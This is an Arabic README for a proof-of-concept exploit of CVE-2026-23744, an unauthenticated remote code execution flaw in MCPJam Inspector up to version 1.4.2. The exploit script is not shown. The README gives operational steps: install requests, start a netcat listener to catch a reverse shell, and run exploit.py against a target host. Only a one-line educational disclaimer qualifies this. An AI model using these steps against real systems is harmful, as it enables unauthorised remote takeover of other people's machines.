
إثبات مفهوم لاستغلال CVE-2026-23744، يوضح تنفيذًا عن بُعد للتعليمات البرمجية دون مصادقة في إصدارات MCPJam Inspector حتى 1.4.2 عبر طلبات HTTP مصممة بعناية.
يقوم سكربت بايثون في إثبات المفهوم هذا بإرسال طلب HTTP بسيط إلى المضيف الهدف الذي يشغّل MCPJam inspector (الإصدار <= 1.4.2) ويُطلق هجوم تنفيذ الأوامر عن بُعد (RCE). راجع هذا التنبيه للحصول على التفاصيل.
تثبيت requests:
pip install requests
أولاً، قم بإعداد المستمع الخاص بك:
nc -lvnp <lport> # استبدل بمنفذ الاستماع الخاص بك
ثم، افتح طرفية أخرى، وقم بتشغيل إثبات المفهوم:
cd CVE-2026-23744
python3 exploit.py
هذا المشروع مخصص لأغراض تعليمية وبحثية فقط. لا تستخدم هذا الكود ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
MIT License